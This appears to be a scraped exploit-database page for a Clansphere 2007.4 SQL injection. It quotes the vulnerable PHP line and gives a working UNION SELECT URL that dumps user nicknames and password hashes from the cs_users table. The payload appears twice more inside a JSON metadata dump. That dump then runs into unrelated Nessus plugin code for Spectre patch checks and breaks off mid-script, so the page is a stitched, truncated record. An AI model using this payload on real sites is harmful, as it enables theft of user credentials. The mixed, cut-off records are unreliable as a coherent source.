Search...

Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability

2007-09-22T00:00:00

ID 1337DAY-ID-2161
Type zdt
Reporter IHTeam
Modified 2007-09-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability
=============================================================



#########################################################################################
#
#        Inclusion Hunter Team
#
#
#         [Clansphere 2007.4]
#
#
# Class:     SQL Injection
# Found:     22/09/2007
# Remote:    Yes
# Site:      http://www.clansphere.net/
# Author:    R00T[ATI] of IHTeam
#
#########################################################################################


       Vulnerable code:
       mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
 $where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================




       Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu

ll%20FROM%20cs_users/*
===================================================================================================================


       Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================




#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"hash": "a7a5311135c1880436f2cd8f29ea6e27640190c9b4269026fc13b9afc651e4d8", "id": "1337DAY-ID-2161", "lastseen": "2018-01-05T07:15:32", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "3571eadee67d15b4203d837e108549d4", "key": "href"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "modified"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "213796e4789dd8e233c042781b9efb42", "key": "reporter"}, {"hash": "0b8800f4bf25495937e1113de1bf6c71", "key": "sourceData"}, {"hash": "e1749de95cf23d9c27f0eaa75a16e504", "key": "sourceHref"}, {"hash": "b2875e3e036693eed73190ebd6cd3bcc", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-29725"]}], "modified": "2018-01-05T07:15:32"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/2161", "description": "Exploit for unknown platform in category web applications", "title": "Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "11897d99c0a98edc4962acdde2b8c359e67238841c4ff018310b9e7f7e4e97a1", "id": "1337DAY-ID-2161", "lastseen": "2016-04-20T01:59:06", "enchantments": {"score": {"value": 9.3, "modified": "2016-04-20T01:59:06"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b2875e3e036693eed73190ebd6cd3bcc", "key": "title"}, {"hash": "213796e4789dd8e233c042781b9efb42", "key": "reporter"}, {"hash": "7ff037c1908c525d974c29e0513ca0c8", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "published"}, {"hash": "a6ec852781591271ae5fc3357ba92845", "key": "sourceData"}, {"hash": "97f8bf13fc2efdca719649b4068c3a31", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2161", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=============================================================\r\nClansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\n#########################################################################################\r\n#\r\n# Inclusion Hunter Team\r\n#\r\n#\r\n# [Clansphere 2007.4]\r\n#\r\n#\r\n# Class: SQL Injection\r\n# Found: 22/09/2007\r\n# Remote: Yes\r\n# Site: http://www.clansphere.net/\r\n# Author: R00T[ATI] of IHTeam\r\n#\r\n#########################################################################################\r\n\r\n\r\n Vulnerable code:\r\n mods/banners/navlist.php\r\n============================================================================================================\r\nif(!empty($_GET['cat_id'])) {\r\n $where = \"categories_id = '\" . $_GET['cat_id'] . \"'\";\r\n============================================================================================================\r\n\r\n\r\n\r\n\r\n Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):\r\n===================================================================================================================\r\nhttp://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu\r\n\r\nll%20FROM%20cs_users/*\r\n===================================================================================================================\r\n\r\n\r\n Thanks To:\r\n=================================\r\nWhite_Sheep for his Bugs Hunter;\r\n=================================\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2007-09-22T00:00:00", "references": [], "reporter": "IHTeam", "modified": "2007-09-22T00:00:00", "href": "http://0day.today/exploit/description/2161"}, "lastseen": "2016-04-20T01:59:06", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=============================================================\r\nClansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\n#########################################################################################\r\n#\r\n# Inclusion Hunter Team\r\n#\r\n#\r\n# [Clansphere 2007.4]\r\n#\r\n#\r\n# Class: SQL Injection\r\n# Found: 22/09/2007\r\n# Remote: Yes\r\n# Site: http://www.clansphere.net/\r\n# Author: R00T[ATI] of IHTeam\r\n#\r\n#########################################################################################\r\n\r\n\r\n Vulnerable code:\r\n mods/banners/navlist.php\r\n============================================================================================================\r\nif(!empty($_GET['cat_id'])) {\r\n $where = \"categories_id = '\" . $_GET['cat_id'] . \"'\";\r\n============================================================================================================\r\n\r\n\r\n\r\n\r\n Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):\r\n===================================================================================================================\r\nhttp://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu\r\n\r\nll%20FROM%20cs_users/*\r\n===================================================================================================================\r\n\r\n\r\n Thanks To:\r\n=================================\r\nWhite_Sheep for his Bugs Hunter;\r\n=================================\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2007-09-22T00:00:00", "references": [], "reporter": "IHTeam", "modified": "2007-09-22T00:00:00", "href": "https://0day.today/exploit/description/2161"}

{"nessus": [{"lastseen": "2019-02-21T01:45:09", "bulletinFamily": "scanner", "description": "Add new CPU features for speculative store bypass (CVE-2018-3639)\n\nOn Intel x86 hosts, the 'ssbd' feature must be explicitly added to any virtual machines that are not using host-passthrough/host-model CPU setup. NB this requires new microcode too, which is not yet available in Fedora microcode_ctl RPMs.\n\nOn AMD x86 hosts, the 'virt-ssbd' feature must be explicitly added to any virtual machines that are not using host-passthrough/host-model CPU setup. There is no microcode dependency for AMD as this is a virtualized CPUID feature.\n\nIn both cases, kernel >= 4.16.10-301 is required on the host and guest in order to activate the fix.\n\nQEMU >= qemu-2.11.1-3.fc28 is also required on the host\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-03T00:00:00", "id": "FEDORA_2018-527698A904.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=120426", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : libvirt (2018-527698a904) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-527698a904.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120426);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/01/03 10:25:36\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"FEDORA\", value:\"2018-527698a904\");\n\n script_name(english:\"Fedora 28 : libvirt (2018-527698a904) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add new CPU features for speculative store bypass (CVE-2018-3639)\n\nOn Intel x86 hosts, the 'ssbd' feature must be explicitly added to any\nvirtual machines that are not using host-passthrough/host-model CPU\nsetup. NB this requires new microcode too, which is not yet available\nin Fedora microcode_ctl RPMs.\n\nOn AMD x86 hosts, the 'virt-ssbd' feature must be explicitly added to\nany virtual machines that are not using host-passthrough/host-model\nCPU setup. There is no microcode dependency for AMD as this is a\nvirtualized CPUID feature.\n\nIn both cases, kernel >= 4.16.10-301 is required on the host and guest\nin order to activate the fix.\n\nQEMU >= qemu-2.11.1-3.fc28 is also required on the host\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-527698a904\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvirt package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libvirt-4.1.0-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:43:44", "bulletinFamily": "scanner", "description": "An update for qemu-kvm is now available for Red Hat Enterprise Linux 6.4 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2018-3401.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=118550", "published": "2018-10-31T00:00:00", "title": "RHEL 6 : qemu-kvm (RHSA-2018:3401) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3401. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118550);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:3401\");\n\n script_name(english:\"RHEL 6 : qemu-kvm (RHSA-2018:3401) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for qemu-kvm is now available for Red Hat Enterprise Linux\n6.4 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-guest-agent-win32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3401\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-guest-agent-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-guest-agent-win32-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-img-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-debuginfo-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-0.12.1.2-2.355.el6_4.12\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu-guest-agent / qemu-guest-agent-win32 / qemu-img / qemu-kvm / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:42:57", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could have been exploited by sending a crafted QMP command (including guest-file-read with a large count value) to the agent via the listening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming fragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the patches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-2973-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117900", "published": "2018-10-03T00:00:00", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2973-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117900);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/01 13:19:06\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182973-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ea77912\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-2116=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-2116=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-2116=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-2116=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 